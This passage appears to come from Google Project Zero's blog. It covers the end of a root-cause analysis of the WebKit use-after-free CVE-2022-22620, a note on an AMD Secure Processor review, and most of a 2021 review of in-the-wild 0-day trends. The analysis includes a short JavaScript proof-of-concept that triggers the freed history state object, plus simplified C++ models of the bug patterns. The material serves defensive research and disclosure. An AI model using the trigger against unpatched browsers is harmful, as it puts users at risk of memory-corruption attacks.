Now that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped (FrameLoader.cpp#1158):

m_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());

The callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the “freed” object was “used”.

If we go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like CodeQL to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:

FrameLoader::loadInSameDocument
  FrameLoader::scrollToFragmentWithParentBoundary
    FrameView::scrollToFragment
      FrameView::scrollToFragmentInternal
        FocusController::setFocusedElement
          FocusController::setFocusedFrame
            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));

The blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we’re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.

The last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it’s therefore free’d. loadInSameDocument still uses the free’d stateObject in its call to statePopped.

input = document.body.appendChild(document.createElement("input"));
a = document.body.appendChild(document.createElement("a"));
a.id = "foo";
history.pushState("state1", "", location + "#foo");
history.pushState("state2", "");
setTimeout(() => {
        input.focus();
        input.onblur = () => history.replaceState("state3", "");
        setTimeout(() => history.back(), 1000);
}, 1000);

In both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.

Conclusion

Usually when we talk about variants, they exist due to incomplete patches: the vendor doesn’t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don’t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.

There’s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices:

  • Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.
  • Submitted a test case with the patch.
  • Detailed commit messages explaining the vulnerability and how they were fixing it.
  • Additional hardening measures during deserialization.

As an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turnaround expectations, under-appreciated and under-rewarded refactoring and security efforts, and a lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts will make a difference. It will also save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation.

While this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we’ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It’s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches.

Release of Technical Report into the AMD Security Processor

By: Anonymous
10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor, AMD can add additional security features to the firmware, but as with all complex systems, it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

The More You Know, The More You Know You Don’t Know

By: Anonymous
19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous and publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using, so we’ll never know exactly what percentage of 0-days we’re missing in our tracking, or what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable, including launching mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

[Bar graph: number of in-the-wild 0-days detected per year, 2015-2021. Totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparent disclosure of exploited 0-day vulnerabilities are positive indicators for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

[Bar graph: number of distinct reporters of in-the-wild 0-day vulnerabilities per year, 2019-2021. 2019: 9, 2020: 10, 2021: 20. Data from the tracking spreadsheet linked above.]

[Line graph: in-the-wild 0-days found by the vendor in their own products per year, 2015-2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data from the tracking spreadsheet linked above.]

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

[Bar graph: Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year, split into anonymously and non-anonymously reported. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: 8 non-anonymous and 12 anonymous. 2021 is the only year with anonymously reported 0-days. Data from the tracking spreadsheet linked above.]

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor’s own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprisingly though, there was nothing new amongst all those data points. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once “0-day is hard”, we’d expect that, to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never-before-seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are fewer DOM bugs, and more bugs targeting other browser components like IndexedDB and WebGL, than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where locking is insufficient, such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where locking was also insufficient, such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.
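The shape of this bug pattern, sketched in simplified C++ with invented names (this is not Chromium's code), is a buffer reachable from both the main thread, via a script-visible API that can reallocate it, and the audio rendering thread, with correctness depending on both sides holding the same lock:

#include <cstddef>
#include <mutex>
#include <vector>

struct AudioNodeModel {
    std::vector<float> buffer;
    std::mutex lock;

    // Audio rendering thread.
    void Process() {
        // The bug pattern is iterating 'buffer' *without* holding 'lock',
        // racing against Reconfigure() freeing the backing store.
        std::lock_guard<std::mutex> guard(lock);  // the fix: lock on both sides
        for (float sample : buffer) { (void)sample; }
    }

    // Main thread, reachable from script.
    void Reconfigure(std::size_t frames) {
        std::lock_guard<std::mutex> guard(lock);
        buffer.assign(frames, 0.0f);  // may free and reallocate the old buffer
    }
};

int main() {
    AudioNodeModel node;
    node.Reconfigure(128);
    node.Process();
}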

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the TurboFan JIT in Chromium’s JavaScript engine, V8, where TurboFan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to TurboFan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due to sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

[Bar graph: Internet Explorer in-the-wild 0-days discovered per year, 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from the tracking spreadsheet linked above.]

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411, targets of the campaign initially received a .mht file, which prompted the user to open it in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 were two common memory corruption bug patterns: a use-after-free, where a user-controlled callback runs in between two actions on an object and the user frees the object during that callback, and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain with CVE-2021-40444, but the MSHTML one meant that as soon as the Office document was opened, the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has been in progress for a few years, and was predicted with the end-of-life of Windows 7 in 2020, which is why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k, while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of the 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10, Microsoft began dedicating more and more resources to locking down the attack surface of Win32k, so as those older versions have hit end-of-life, Win32k becomes a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.
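The underlying shape of these Win32k bugs, sketched below in simplified C++ with invented names (this is not Windows code), is a routine that calls back into user mode and then acts on object state without re-checking whether the callback changed it:

#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <functional>

struct WindowModel {
    bool fieldIsKernelOffset = false;  // cf. the flag set via NtUserConsoleControl
    std::uintptr_t field = 0;
};

void AllocExtraBytes(WindowModel& w,
                     const std::function<void(WindowModel&)>& userCallback) {
    userCallback(w);  // user code runs here and may flip fieldIsKernelOffset

    // BUG pattern: write a "user-mode pointer" without re-checking the flag.
    // If the callback set fieldIsKernelOffset, later code will treat this
    // value as an offset into the kernel heap.
    w.field = 0x41414141;
}

int main() {
    WindowModel w;
    AllocExtraBytes(w, [](WindowModel& win) {
        win.fieldIsKernelOffset = true;  // cf. calling NtUserConsoleControl mid-callback
    });
    std::printf("flag=%d field=0x%zx\n", w.fieldIsKernelOffset, (std::size_t)w.field);
}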

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

[Bar graph: macOS and iOS in-the-wild 0-days discovered per year. macOS: 0 every year except 2021, when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from the tracking spreadsheet linked above.]

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These 3 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and CVE-2021-30883 is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, CVE-2022-22587.

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. CVE-2021-1782 exploited a vulnerability in mach vouchers while CVE-2021-30869 exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. CVE-2019-6625 was exploited as a part of an exploit chain targeting iOS 11.4.1-12.1.2 and was also a vulnerability in mach vouchers.

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: CVE-2020-27932 & CVE-2020-27950. This year’s CVE-2021-30869 is a pretty close variant of 2020’s CVE-2020-27932. Tielei Wang and Xinru Chi actually presented on this vulnerability at Zer0Con 2021 in April 2021. In their presentation, they explained that they found it while doing variant analysis on CVE-2020-27932. Tielei Wang explained via Twitter that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2, which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.

The two FORCEDENTRY exploits (CVE-2021-30860 and the sandbox escape) were the only ones that made us all go “wow!” this year. For CVE-2021-30860, the integer overflow in CoreGraphics, it was because:

  1. For years we’ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and
  2. The exploit was an impressive work of art.

The sandbox escape (CVE requested, not yet assigned) was impressive because it’s one of the few times we’ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs.

For CVE-2021-30860, the vulnerability itself wasn’t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Groß & Ian Beer as “one of the most technically sophisticated exploits [they]’ve ever seen”. Their blogpost shares all the details, but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:

        

Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

This is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.

Android

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215. Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we’ll compare it to public security research.

For the 7 Android 0-days they targeted the following components:

5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against “Android devices”, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU.

Public security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, Guang Gong, Man Yue Mo, and Ben Hawkes all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver.

The two non-GPU driver 0-days (CVE-2021-0920 and CVE-2021-1048) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it’s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.

The vulnerability now referred to as CVE-2021-0920 was actually found in September 2016 and discussed on the Linux kernel mailing lists. A patch was even developed back in 2016, but it didn’t end up being submitted. The bug was finally fixed in the Linux kernel in July 2021 after the detection of the in-the-wild exploit targeting Android. The patch then made it into the Android security bulletin in November 2021.

CVE-2021-1048 remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.

Microsoft Exchange Server

In 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)  were all disclosed and patched at the same time and used together in a single operation. The fifth (CVE-2021-42321) was patched on its own in November 2021. CVE-2021-42321 was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with CVE-2021-42321, the attackers would have required at least another 0-day for successful exploitation since CVE-2021-42321 is a post-authentication bug.

Of the four Exchange in-the-wild 0-days used in the first campaign, CVE-2021-26855, which is also known as “ProxyLogon”, is the only one that’s pre-auth. CVE-2021-26855 is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, CVE-2021-26858 and CVE-2021-27065 allowed attackers to write arbitrary files to the system. CVE-2021-26857 is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.

For the second campaign, CVE-2021-42321, like CVE-2021-26858, is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.

While there were a significant number of 0-days in Exchange detected and disclosed in 2021, it’s important to remember that they were all used as 0-days in only two different campaigns. This is an example of why we don’t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring attackers to use four 0-days to have success is preferable to an attacker only needing one 0-day to successfully gain access.

While this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was n-day exploitation of Exchange Servers. Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we’ll likely see it continue into 2022.

Outstanding Questions

While there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions arose about biases in detection, what we’re missing and why, and the need for more transparency from both vendors and researchers.

Until the day that attackers decide to happily share all their exploits with us, we can’t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we’re very likely missing. From that, these are some of the key questions we’re asking ourselves as we move into 2022:

Where are the [x] 0-days?

Despite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers, and yet only one 0-day in a messaging app, in this case iMessage, was found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.

Along with messaging apps, there are other platforms/targets we’d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there’s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.

This leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Unless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don’t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.

Are we seeing the same bug patterns because that’s what we know how to detect?

As we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that’s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that’s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we’d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers.

Where are the spl0itz?

To successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful).

